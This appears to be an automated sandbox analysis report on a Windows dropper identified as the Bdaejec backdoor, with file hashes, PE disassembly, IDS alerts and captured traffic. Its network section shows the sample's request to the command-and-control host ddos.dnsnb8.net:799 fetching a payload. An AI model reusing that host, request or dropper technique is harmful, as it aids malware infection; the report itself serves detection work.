SHA-512:	C767C18A40301C2217D0F83ED1BC14D0CEC121150C924E59E79E809148542CF58602DCF5A9DDFF0DE593B0567828F83CD48F089053608FCF5D34351E0CBDF750
Malicious:	false
Reputation:	low
Preview:	..V.e.r.s.i.o.n.=.1.....E.v.e.n.t.T.y.p.e.=.A.P.P.C.R.A.S.H.....E.v.e.n.t.T.i.m.e.=.1.3.3.7.9.8.5.8.6.4.1.3.7.1.6.4.5.9.....R.e.p.o.r.t.T.y.p.e.=.2.....C.o.n.s.e.n.t.=.1.....U.p.l.o.a.d.T.i.m.e.=.1.3.3.7.9.8.5.8.6.4.2.4.6.5.4.0.3.5.....R.e.p.o.r.t.S.t.a.t.u.s.=.5.2.4.3.8.4.....R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.3.5.f.e.4.6.9.0.-.f.6.8.5.-.4.5.e.f.-.b.a.b.5.-.6.b.0.b.7.7.4.3.8.9.c.d.....I.n.t.e.g.r.a.t.o.r.R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.2.8.5.b.3.9.f.6.-.0.b.4.9.-.4.0.5.5.-.a.e.7.6.-.a.7.3.b.5.6.a.d.7.c.a.5.....W.o.w.6.4.H.o.s.t.=.3.4.4.0.4.....W.o.w.6.4.G.u.e.s.t.=.3.3.2.....N.s.A.p.p.N.a.m.e.=.I.i.v.J.T.s.F.D...e.x.e.....A.p.p.S.e.s.s.i.o.n.G.u.i.d.=.0.0.0.0.1.3.2.c.-.0.0.0.1.-.0.0.1.4.-.3.f.9.5.-.d.0.f.b.1.a.5.9.d.b.0.1.....T.a.r.g.e.t.A.p.p.I.d.=.W.:.0.0.0.6.b.f.3.2.4.0.b.2.8.f.4.0.f.f.e.3.4.3.7.6.1.a.9.f.e.5.1.4.1.5.e.d.0.0.0.0.f.f.f.f.!.0.0.0.0.9.9.e.e.3.1.c.d.4.b.0.d.6.a.4.b.6.2.7.7.9.d.a.3.6.e.0.e.e.e.c.d.d.8.0.5.8.9.f.c.!.I.i.v.J.T.s.F.D...e.x.e.....T.a.r.g.e.t.A.p.p.V.e.r.=.

C:\ProgramData\Microsoft\Windows\WER\Temp\WER5858.tmp.dmp

Download File

Process:	C:\Windows\SysWOW64\WerFault.exe
File Type:	Mini DuMP crash report, 14 streams, Sat Dec 28 11:24:01 2024, 0x1205a4 type
Category:	dropped
Size (bytes):	165808
Entropy (8bit):	1.7950274724675217
Encrypted:	false
SSDEEP:	384:LGT4bASAMB9l1SvwWHgjkvUl1yVjBhx9tVoWjJJ7WifY2Z:50QB9l14wWAgvUloJ9fKWjb7
MD5:	10510B3C4EEA426A7D5081A9844DBCBF
SHA1:	C24B7DDDFB0F3FB5515FCDA52E171FF301340065
SHA-256:	B7837F693B8645D3EFDDFA5428A7D9356CF1AD367FC03712BE463C19CCB7F094
SHA-512:	A43EC101D2C3466B564C358A5AA14772C60F802385E16CFE8ABCE96DEF1267A8B7F767DD1195FC45D293FEFB474544D0621C33173B86ED703DE2F0764FDA9E00
Malicious:	false
Reputation:	low
Preview:	MDMP..a..... .........og............t...............\|.......d...lQ..........T.......8...........T...........8<..xK.......... !...........#..............................................................................eJ.......#......GenuineIntel............T.......,.....og.............................0..............,...E.a.s.t.e.r.n. .S.t.a.n.d.a.r.d. .T.i.m.e...........................................E.a.s.t.e.r.n. .S.u.m.m.e.r. .T.i.m.e...............................................1.9.0.4.1...1...a.m.d.6.4.f.r.e...v.b._.r.e.l.e.a.s.e...1.9.1.2.0.6.-.1.4.0.6...................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\ProgramData\Microsoft\Windows\WER\Temp\WER5BB5.tmp.WERInternalMetadata.xml

Download File

Process:	C:\Windows\SysWOW64\WerFault.exe
File Type:	XML 1.0 document, Unicode text, UTF-16, little-endian text, with CRLF line terminators
Category:	dropped
Size (bytes):	6280
Entropy (8bit):	3.722103987938504
Encrypted:	false
SSDEEP:	96:RSIU6o7wVetbFH6pcYzCzxHN5aMQUG89bPJF/sfu4H9J9m:R6l7wVeJFH6pcYzCxpDG89bz/sfZHRm
MD5:	6FB3A38F0776D3D720EADA38711DE0C9
SHA1:	F2D97D29B5DFE89AF28EB56D70ED3EF3BBA11F72
SHA-256:	18A6DFAE4702F05EEDD68FE8D46A8749A00CA77DD13A989ADFB30DA5DE94DDB4
SHA-512:	5CDB7D1613EB1BF553CA106CD3FA6803B3FFF09B36ED8000A3E81C5636E72C5847E8921C63F0CB02E9854BDB71B6B03176482B394D0DA1494C04CF030EE0EDFA
Malicious:	false
Reputation:	low
Preview:	..<.?.x.m.l. .v.e.r.s.i.o.n.=.".1...0.". .e.n.c.o.d.i.n.g.=.".U.T.F.-.1.6.".?.>.....<.W.E.R.R.e.p.o.r.t.M.e.t.a.d.a.t.a.>.......<.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.........<.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.1.0...0.<./.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.........<.B.u.i.l.d.>.1.9.0.4.5.<./.B.u.i.l.d.>.........<.P.r.o.d.u.c.t.>.(.0.x.3.0.).:. .W.i.n.d.o.w.s. .1.0. .P.r.o.<./.P.r.o.d.u.c.t.>.........<.E.d.i.t.i.o.n.>.P.r.o.f.e.s.s.i.o.n.a.l.<./.E.d.i.t.i.o.n.>.........<.B.u.i.l.d.S.t.r.i.n.g.>.1.9.0.4.1...2.0.0.6...a.m.d.6.4.f.r.e...v.b._.r.e.l.e.a.s.e...1.9.1.2.0.6.-.1.4.0.6.<./.B.u.i.l.d.S.t.r.i.n.g.>.........<.R.e.v.i.s.i.o.n.>.2.0.0.6.<./.R.e.v.i.s.i.o.n.>.........<.F.l.a.v.o.r.>.M.u.l.t.i.p.r.o.c.e.s.s.o.r. .F.r.e.e.<./.F.l.a.v.o.r.>.........<.A.r.c.h.i.t.e.c.t.u.r.e.>.X.6.4.<./.A.r.c.h.i.t.e.c.t.u.r.e.>.........<.L.C.I.D.>.2.0.5.7.<./.L.C.I.D.>.......<./.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.......<.P.r.o.c.e.s.s.I.n.f.o.r.m.a.t.i.o.n.>.........<.P.i.d.>.4.9.0.8.<./.P.i.

C:\ProgramData\Microsoft\Windows\WER\Temp\WER5BE4.tmp.xml

Download File

Process:	C:\Windows\SysWOW64\WerFault.exe
File Type:	XML 1.0 document, ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	4565
Entropy (8bit):	4.4606453672004935
Encrypted:	false
SSDEEP:	48:cvIwWl8zsiJg77aI9NSWpW8VY9Ym8M4JkaF3D+q8SVVSIg6ad:uIjfwI7Lz7V5JxDpV5g6ad
MD5:	4EA6337AEAA0B9D6877F4F833E5C6028
SHA1:	49E01EEAA96380CC151D761F85591108CACBD4E7
SHA-256:	AF9C274DC0D952573DB497E2531425A0A7F72FE6E72FDFAB268F5C5795153B14
SHA-512:	F20D12E6C22A5C48B5A3A4EBAB92BCBF79925EC4B6FB9BADD96A87D729106BE422C0A7FF1A1DDBF622DFDCAFE6E6E68F19939DF0BB262C50F0FF6EDBF84C61AE
Malicious:	false
Reputation:	low
Preview:	<?xml version="1.0" encoding="UTF-8" standalone="yes"?>..<req ver="2">.. <tlm>.. <src>.. <desc>.. <mach>.. <os>.. <arg nm="vermaj" val="10" />.. <arg nm="vermin" val="0" />.. <arg nm="verbld" val="19045" />.. <arg nm="vercsdbld" val="2006" />.. <arg nm="verqfe" val="2006" />.. <arg nm="csdbld" val="2006" />.. <arg nm="versp" val="0" />.. <arg nm="arch" val="9" />.. <arg nm="lcid" val="2057" />.. <arg nm="geoid" val="223" />.. <arg nm="sku" val="48" />.. <arg nm="domain" val="0" />.. <arg nm="prodsuite" val="256" />.. <arg nm="ntprodtype" val="1" />.. <arg nm="platid" val="2" />.. <arg nm="tmsi" val="651026" />.. <arg nm="osinsty" val="1" />.. <arg nm="iever" val="11.789.19041.0-11.0.1000" />.. <arg nm="portos" val="0" />.. <arg nm="ram" val="409

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\k1[1].rar

Download File

Process:	C:\Users\user\AppData\Local\Temp\IivJTsFD.exe
File Type:	ASCII text
Category:	dropped
Size (bytes):	4
Entropy (8bit):	1.5
Encrypted:	false
SSDEEP:	3:Nv:9
MD5:	D3B07384D113EDEC49EAA6238AD5FF00
SHA1:	F1D2D2F924E986AC86FDF7B36C94BCDF32BEEC15
SHA-256:	B5BB9D8014A0F9B1D61E21E796D78DCCDF1352F23CD32812F4850B878AE4944C
SHA-512:	0CF9180A764ABA863A67B6D72F0918BC131C6772642CB2DCE5A34F0A702F9470DDC2BF125C12198B1995C233C34B4AFD346C54A2334C350A948A51B6E8B4E6B6
Malicious:	false
Reputation:	moderate, very likely benign file
Preview:	foo.

C:\Users\user\AppData\Local\Temp\241620A7.exe

Download File

Process:	C:\Users\user\AppData\Local\Temp\IivJTsFD.exe
File Type:	ASCII text
Category:	modified
Size (bytes):	4
Entropy (8bit):	1.5
Encrypted:	false
SSDEEP:	3:Nv:9
MD5:	D3B07384D113EDEC49EAA6238AD5FF00
SHA1:	F1D2D2F924E986AC86FDF7B36C94BCDF32BEEC15
SHA-256:	B5BB9D8014A0F9B1D61E21E796D78DCCDF1352F23CD32812F4850B878AE4944C
SHA-512:	0CF9180A764ABA863A67B6D72F0918BC131C6772642CB2DCE5A34F0A702F9470DDC2BF125C12198B1995C233C34B4AFD346C54A2334C350A948A51B6E8B4E6B6
Malicious:	false
Preview:	foo.

C:\Users\user\AppData\Local\Temp\IivJTsFD.exe

Download File

Process:	C:\Users\user\Desktop\gT6IitwToH.exe
File Type:	PE32 executable (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	15872
Entropy (8bit):	7.031113762428177
Encrypted:	false
SSDEEP:	384:7XZQaD7U8iu4YsAa7ZA0UvH2lsRv21yW7GbAxur6+Y9PffPz:1QGPL4vzZq2o9W7GsxBbPr
MD5:	56B2C3810DBA2E939A8BB9FA36D3CF96
SHA1:	99EE31CD4B0D6A4B62779DA36E0EEECDD80589FC
SHA-256:	4354970CCC7CD6BB16318F132C34F6A1B3D5C2EA7FF53E1C9271905527F2DB07
SHA-512:	27812A9A034D7BD2CA73B337AE9E0B6DC79C38CFD1A2C6AC9D125D3CC8FA563C401A40D22155811D5054E5BAA8CF8C8E7E03925F25FA856A9BA9DEA708D15B4E
Malicious:	true
Antivirus:	Antivirus: Avira, Detection: 100% Antivirus: Joe Sandbox ML, Detection: 100% Antivirus: ReversingLabs, Detection: 97%
Joe Sandbox View:	Filename: #U65b0#U7248#U7f51#U5173.exe, Detection: malicious, Browse Filename: #U8865#U4e01#U6253#U5305.exe, Detection: malicious, Browse Filename: #U65b0#U7248#U7f51#U5173Srv.exe, Detection: malicious, Browse Filename: gE4NVCZDRk.exe, Detection: malicious, Browse Filename: ib.exe, Detection: malicious, Browse Filename: SecuriteInfo.com.Win32.Malware-gen.17468.9520.exe, Detection: malicious, Browse Filename: 8VB4lVuZk3.exe, Detection: malicious, Browse Filename: biKy3nZEyJ.exe, Detection: malicious, Browse Filename: biKy3nZEyJ.exe, Detection: malicious, Browse Filename: #U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.exe, Detection: malicious, Browse
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......z.I.>.'.>.'.>.'..7\.2.'...(.?.'.>.&.y.'.Q.#.=.'..).?.'.7...6.'.7...?.'.Rich>.'.................PE..L...JG.R.............................`.......0....@.......................................@..................................p...............................o.......................................................................................text.... ..........................`....rdata.......0......................@....data........@......................@....reloc.......P.......(..............@....aspack.. ...`.......,..............`....adata...............>..............@...................................................................................................................................................................................................................................................................................................

C:\Windows\appcompat\Programs\Amcache.hve

Download File

Process:	C:\Users\user\AppData\Local\Temp\IivJTsFD.exe
File Type:	MS Windows registry file, NT/2000 or above
Category:	dropped
Size (bytes):	1835008
Entropy (8bit):	4.466056531032068
Encrypted:	false
SSDEEP:	6144:/IXfpi67eLPU9skLmb0b4+WSPKaJG8nAgejZMMhA2gX4WABl0uNUdwBCswSbnz:wXD94+WlLZMM6YFHK+n
MD5:	F32D6C645169437B47B024E84EF1A3BA
SHA1:	6F897114AF6DC86525D5D2F8788365EEE61D0DED
SHA-256:	124F0BDA6478A2C2A1EBD8FEEFBFB409302D4E604144D48239994B6C90538399
SHA-512:	020AEF1383676E3D5A1198FCEDD8FD99FEAAB913AA4A9B0E271821155C083135DDA87F1F4B98E566CA0D1569BF1D76CDA28B6563D5E4537F907E8FD9D5285157
Malicious:	false
Preview:	regf7...7....\.Z.................... ...........\.A.p.p.C.o.m.p.a.t.\.P.r.o.g.r.a.m.s.\.A.m.c.a.c.h.e...h.v.e....c...b...#.......c...b...#...........c...b...#......rmtm.....Y..............................................................................................................................................................................................................................................................................................................................................F...........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

Static File Info

General

File type:	PE32 executable (GUI) Intel 80386, for MS Windows
Entropy (8bit):	6.575697014918129
TrID:	Win32 Executable (generic) a (10002005/4) 99.96% Generic Win/DOS Executable (2004/3) 0.02% DOS Executable Generic (2002/1) 0.02% Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
File name:	gT6IitwToH.exe
File size:	82'432 bytes
MD5:	8da10c130681fd03a6b64ad9a827a433
SHA1:	55be25e240ff1eebca02e9db0f9cec91f03729c3
SHA256:	45c750869e31ed836f892cb85fe2d968146a3ae10261f1e28cef8e61b8265f55
SHA512:	8e86e44b229c5d0b9014997f19f4f27f3aebed36d4566a8c7705e29b525ca6cfc67546ee9759c190c44ae1d3da13bd371b5fce21ffb4e2c9469b3f9b0dc603dc
SSDEEP:	1536:Yg/6/tM8NXDjPX0QWlfGMckTQK0GCq2iW7z:Hk3U8kTQTGCH
TLSH:	A1838D61B980C073C44A6079441DC7B19F7FBC3126B5C997BB960BBB5F313D1EA2A24A
File Content Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........S...2...2...2.......2...2...2...}8..2...`*..2...`;..2...`-..2...`?..2..Rich.2..........................PE..L......Q...........

File Icon


Icon Hash:	90cececece8e8eb0

Static PE Info

General

Entrypoint:	0x414000
Entrypoint Section:	wu
Digitally signed:	false
Imagebase:	0x400000
Subsystem:	windows gui
Image File Characteristics:	RELOCS_STRIPPED, EXECUTABLE_IMAGE, 32BIT_MACHINE
DLL Characteristics:	TERMINAL_SERVER_AWARE
Time Stamp:	0x518BB101 [Thu May 9 14:21:53 2013 UTC]
TLS Callbacks:
CLR (.Net) Version:
OS Version Major:	5
OS Version Minor:	0
File Version Major:	5
File Version Minor:	0
Subsystem Version Major:	5
Subsystem Version Minor:	0
Import Hash:	ba2c974ed567c90fe365844af978f320

Entrypoint Preview

Instruction
push ebp
mov ebp, esp
sub esp, 0000016Ch
xor eax, eax
push ebx
push esi
push edi
mov dword ptr [ebp-24h], eax
mov dword ptr [ebp-10h], eax
mov dword ptr [ebp-14h], eax
mov dword ptr [ebp-08h], eax
mov dword ptr [ebp-0Ch], eax
mov dword ptr [ebp-20h], eax
mov dword ptr [ebp-18h], eax
mov dword ptr [ebp-48h], 4A766949h
mov dword ptr [ebp-44h], 44467354h
mov dword ptr [ebp-40h], 6578652Eh
mov dword ptr [ebp-3Ch], 00000000h
call 00007F002CB7A045h
pop eax
add eax, 00000225h
mov dword ptr [ebp-04h], eax
mov eax, dword ptr fs:[00000030h]
mov dword ptr [ebp-28h], eax
mov eax, dword ptr [ebp-04h]
mov dword ptr [eax], E904C483h
mov eax, dword ptr [ebp-04h]
mov dword ptr [eax+04h], FFFEE3A2h
mov eax, dword ptr [ebp-28h]
mov eax, dword ptr [eax+0Ch]
mov eax, dword ptr [eax+1Ch]
mov eax, dword ptr [eax]
mov eax, dword ptr [eax+08h]
mov ecx, dword ptr [eax+3Ch]
mov ecx, dword ptr [ecx+eax+78h]
add ecx, eax
mov edi, dword ptr [ecx+1Ch]
mov ebx, dword ptr [ecx+20h]
mov esi, dword ptr [ecx+24h]
mov ecx, dword ptr [ecx+18h]
add esi, eax
add edi, eax
add ebx, eax
xor edx, edx
mov dword ptr [ebp-30h], esi
mov dword ptr [ebp-1Ch], edx
mov dword ptr [ebp-34h], ecx
cmp edx, dword ptr [ebp-34h]
jnc 00007F002CB7A18Eh
movzx ecx, word ptr [esi+edx*2]
mov edx, dword ptr [ebx+edx*4]
mov esi, dword ptr [edi+ecx*4]
add edx, eax
mov ecx, dword ptr [edx]
add esi, eax
cmp ecx, 4D746547h
jne 00007F002CB7A094h
cmp dword ptr [edx+04h], 6C75646Fh
jne 00007F002CB7A08Bh

Rich Headers

Programming Language:

[IMP] VS2005 build 50727
[C++] VS2008 build 21022
[ASM] VS2008 build 21022
[ C ] VS2008 build 21022
[LNK] VS2008 build 21022

Data Directories

Name	Virtual Address	Virtual Size	Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IMPORT	0xf934	0x28	.rdata
IMAGE_DIRECTORY_ENTRY_RESOURCE	0x0	0x0
IMAGE_DIRECTORY_ENTRY_EXCEPTION	0x0	0x0
IMAGE_DIRECTORY_ENTRY_SECURITY	0x0	0x0
IMAGE_DIRECTORY_ENTRY_BASERELOC	0x0	0x0
IMAGE_DIRECTORY_ENTRY_DEBUG	0x0	0x0
IMAGE_DIRECTORY_ENTRY_COPYRIGHT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_GLOBALPTR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_TLS	0x0	0x0
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG	0xf488	0x40	.rdata
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IAT	0xe000	0x140	.rdata
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_RESERVED	0x0	0x0

Sections

Name	Virtual Address	Virtual Size	Raw Size	MD5	Xored PE	ZLIB Complexity	File Type	Entropy	Characteristics
.text	0x1000	0xc9ed	0xca00	9c1449c399f02a55d49d67dd9413e89c	False	0.6139193997524752	data	6.618135871473556	IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
.rdata	0xe000	0x2068	0x2200	c3c323d1b4244bb08b2144d7f6ccb84f	False	0.349609375	data	5.290951954639895	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.data	0x11000	0x2bc4	0x1000	3ecb8d5c354d07019fd9bd96c5e5f3a1	False	0.20947265625	data	2.251287542215587	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
wu	0x14000	0x5000	0x4200	5f5af39b4eb409d3a0580a9374b29279	False	0.7772845643939394	data	6.935243059177517	IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE

Imports

DLL

Import

KERNEL32.dll

GenerateConsoleCtrlEvent, GetExitCodeProcess, WaitForSingleObject, CreateProcessA, SetConsoleCtrlHandler, GetModuleFileNameA, EnterCriticalSection, LeaveCriticalSection, GetModuleHandleW, Sleep, GetProcAddress, ExitProcess, GetCommandLineA, GetStartupInfoA, SetHandleCount, GetStdHandle, GetFileType, DeleteCriticalSection, TerminateProcess, GetCurrentProcess, UnhandledExceptionFilter, SetUnhandledExceptionFilter, IsDebuggerPresent, GetLastError, HeapFree, HeapAlloc, GetCPInfo, InterlockedIncrement, InterlockedDecrement, GetACP, GetOEMCP, IsValidCodePage, TlsGetValue, TlsAlloc, TlsSetValue, TlsFree, SetLastError, GetCurrentThreadId, WriteFile, LoadLibraryA, InitializeCriticalSectionAndSpinCount, FreeEnvironmentStringsA, GetEnvironmentStrings, FreeEnvironmentStringsW, WideCharToMultiByte, GetEnvironmentStringsW, HeapCreate, VirtualFree, QueryPerformanceCounter, GetTickCount, GetCurrentProcessId, GetSystemTimeAsFileTime, RtlUnwind, HeapReAlloc, VirtualAlloc, GetConsoleCP, GetConsoleMode, FlushFileBuffers, LCMapStringA, MultiByteToWideChar, LCMapStringW, GetStringTypeA, GetStringTypeW, GetLocaleInfoA, SetFilePointer, HeapSize, CloseHandle, WriteConsoleA, GetConsoleOutputCP, WriteConsoleW, SetStdHandle, CreateFileA, CompareStringA, CompareStringW, SetEnvironmentVariableA, ReadFile, SetEndOfFile, GetProcessHeap, GetFileAttributesA

Network Behavior

Suricata IDS Alerts

Timestamp	SID	Signature	Severity	Source IP	Source Port	Dest IP	Dest Port	Protocol
2024-12-28T12:23:57.549164+0100	2838522	ETPRO MALWARE Backdoor.Win32/Bdaejec.A CnC Domain in DNS Lookup	1	192.168.2.4	65103	1.1.1.1	53	UDP
2024-12-28T12:23:59.200458+0100	2807908	ETPRO MALWARE Backdoor.Win32/Bdaejec.A Checkin	1	192.168.2.4	49730	44.221.84.105	799	TCP

Network Port Distribution

TCP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Dec 28, 2024 12:23:58.100351095 CET	49730	799	192.168.2.4	44.221.84.105
Dec 28, 2024 12:23:58.219991922 CET	799	49730	44.221.84.105	192.168.2.4
Dec 28, 2024 12:23:58.220078945 CET	49730	799	192.168.2.4	44.221.84.105
Dec 28, 2024 12:23:58.220408916 CET	49730	799	192.168.2.4	44.221.84.105
Dec 28, 2024 12:23:58.340631962 CET	799	49730	44.221.84.105	192.168.2.4
Dec 28, 2024 12:23:59.200376987 CET	799	49730	44.221.84.105	192.168.2.4
Dec 28, 2024 12:23:59.200442076 CET	799	49730	44.221.84.105	192.168.2.4
Dec 28, 2024 12:23:59.200458050 CET	49730	799	192.168.2.4	44.221.84.105
Dec 28, 2024 12:23:59.200586081 CET	49730	799	192.168.2.4	44.221.84.105
Dec 28, 2024 12:23:59.205560923 CET	49730	799	192.168.2.4	44.221.84.105
Dec 28, 2024 12:23:59.325092077 CET	799	49730	44.221.84.105	192.168.2.4

UDP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Dec 28, 2024 12:23:57.549164057 CET	65103	53	192.168.2.4	1.1.1.1
Dec 28, 2024 12:23:58.094371080 CET	53	65103	1.1.1.1	192.168.2.4

DNS Queries

Timestamp	Source IP	Dest IP	Trans ID	OP Code	Name	Type	Class	DNS over HTTPS
Dec 28, 2024 12:23:57.549164057 CET	192.168.2.4	1.1.1.1	0xb3e1	Standard query (0)	ddos.dnsnb8.net	A (IP address)	IN (0x0001)	false

DNS Answers

Timestamp	Source IP	Dest IP	Trans ID	Reply Code	Name	CName	Address	Type	Class	DNS over HTTPS
Dec 28, 2024 12:23:58.094371080 CET	1.1.1.1	192.168.2.4	0xb3e1	No error (0)	ddos.dnsnb8.net		44.221.84.105	A (IP address)	IN (0x0001)	false

HTTP Request Dependency Graph

ddos.dnsnb8.net:799

HTTP Packets

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
0	192.168.2.4	49730	44.221.84.105	799	4908	C:\Users\user\AppData\Local\Temp\IivJTsFD.exe

Timestamp	Bytes transferred	Direction	Data
Dec 28, 2024 12:23:58.220408916 CET	288	OUT	GET /cj//k1.rar HTTP/1.1 Accept: / Accept-Encoding: gzip, deflate User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.2; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729) Host: ddos.dnsnb8.net:799 Connection: Keep-Alive

Target ID:	0
Start time:	06:23:56
Start date:	28/12/2024
Path:	C:\Users\user\Desktop\gT6IitwToH.exe
Wow64 process (32bit):	true
Commandline:	"C:\Users\user\Desktop\gT6IitwToH.exe"
Imagebase:	0x400000
File size:	82'432 bytes
MD5 hash:	8DA10C130681FD03A6B64AD9A827A433
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	low
Has exited:	true

Show Windows behavior

Target ID:	1
Start time:	06:23:56
Start date:	28/12/2024
Path:	C:\Users\user\AppData\Local\Temp\IivJTsFD.exe
Wow64 process (32bit):	true
Commandline:	C:\Users\user\AppData\Local\Temp\IivJTsFD.exe
Imagebase:	0x250000
File size:	15'872 bytes
MD5 hash:	56B2C3810DBA2E939A8BB9FA36D3CF96
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Antivirus matches:	Detection: 100%, Avira Detection: 100%, Joe Sandbox ML Detection: 97%, ReversingLabs
Reputation:	moderate
Has exited:	true

Show Windows behavior

Target ID:	4
Start time:	06:24:01
Start date:	28/12/2024
Path:	C:\Windows\SysWOW64\WerFault.exe
Wow64 process (32bit):	true
Commandline:	C:\Windows\SysWOW64\WerFault.exe -u -p 4908 -s 1392
Imagebase:	0xaa0000
File size:	483'680 bytes
MD5 hash:	C31336C1EFC2CCB44B4326EA793040F2
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Execution Graph

Execution Coverage:	6.5%
Dynamic/Decrypted Code Coverage:	0%
Signature Coverage:	4%
Total number of Nodes:	2000
Total number of Limit Nodes:	74

Executed Functions

Function 00414044 Relevance: 33.4, APIs: 4, Strings: 15, Instructions: 171
fileprocessCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CreateFileA.KERNELBASE(?,C0000000,00000000,00000000,00000002,00000080,00000000), ref: 00414223
WriteFile.KERNELBASE(00000000,FFFEE3A2,00003E00,?,00000000), ref: 00414252
CloseHandle.KERNELBASE(00000000), ref: 00414256
WinExec.KERNEL32(?,00000005), ref: 00414262

Strings

el32, xrefs: 004140FB
.dll, xrefs: 00414102
WinE, xrefs: 00414110
lstr, xrefs: 004141A7
GetM, xrefs: 004140B6
athA, xrefs: 00414199
Kern, xrefs: 004140F4
dleA, xrefs: 004140D0
catA, xrefs: 004141AF
Writ, xrefs: 00414148
odul, xrefs: 0041422D
IivJTsFD.exe, xrefs: 004141FD, 00414200
Clos, xrefs: 00414129
Crea, xrefs: 00414169
GetT, xrefs: 00414188

Memory Dump Source

Source File: 00000000.00000002.1653401456.0000000000414000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1653290562.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1653308756.0000000000401000.00000020.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1653342630.000000000040E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1653385715.0000000000411000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1653417786.0000000000415000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_gT6IitwToH.jbxd

Similarity

API ID: File$CloseCreateExecHandleWrite
String ID: .dll$Clos$Crea$GetM$GetT$IivJTsFD.exe$Kern$WinE$Writ$athA$catA$dleA$el32$lstr$odul
API String ID: 3741012433-1184572760
Opcode ID: 2fb4e868c1dacf4118042ed468dbdf65dff8f093e3e8aa25e0eda2f0464a3d80
Instruction ID: 0fad939afa1a3e6eef74dcea6ddb39993472a9db8089d9d8a1791b0fffe143ca
Opcode Fuzzy Hash: 2fb4e868c1dacf4118042ed468dbdf65dff8f093e3e8aa25e0eda2f0464a3d80
Instruction Fuzzy Hash: 1C611978D00215ABCF24CF94D848AEEBBB0BB94315F2582ABD505A7741C7789EC1CB99

Function 004024C4 Relevance: 28.1, APIs: 15, Strings: 1, Instructions: 86
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

_fast_error_exit.LIBCMT ref: 0040250F
__mtinit.LIBCMT ref: 00402515
_fast_error_exit.LIBCMT ref: 00402520
__RTC_Initialize.LIBCMT ref: 00402526
__ioinit.LIBCMT ref: 0040252E
__amsg_exit.LIBCMT ref: 00402539
GetCommandLineA.KERNEL32 ref: 0040253F
___crtGetEnvironmentStringsA.LIBCMT ref: 0040254A
__setargv.LIBCMT ref: 00402554
__amsg_exit.LIBCMT ref: 0040255F
__setenvp.LIBCMT ref: 00402565
__amsg_exit.LIBCMT ref: 00402570
__cinit.LIBCMT ref: 00402577
__amsg_exit.LIBCMT ref: 00402582
__wincmdln.LIBCMT ref: 00402588

Strings

`%], xrefs: 00402545

Memory Dump Source

Source File: 00000000.00000002.1653308756.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1653290562.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1653342630.000000000040E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1653385715.0000000000411000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1653401456.0000000000414000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1653417786.0000000000415000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_gT6IitwToH.jbxd

Similarity

API ID: __amsg_exit$_fast_error_exit$CommandEnvironmentInitializeLineStrings___crt__cinit__ioinit__mtinit__setargv__setenvp__wincmdln
String ID: `%]
API String ID: 3545360858-1254092700
Opcode ID: 47c8b048b90f4a39332f367b4157c1dffe310d981b80df09f713873d210ea5e8
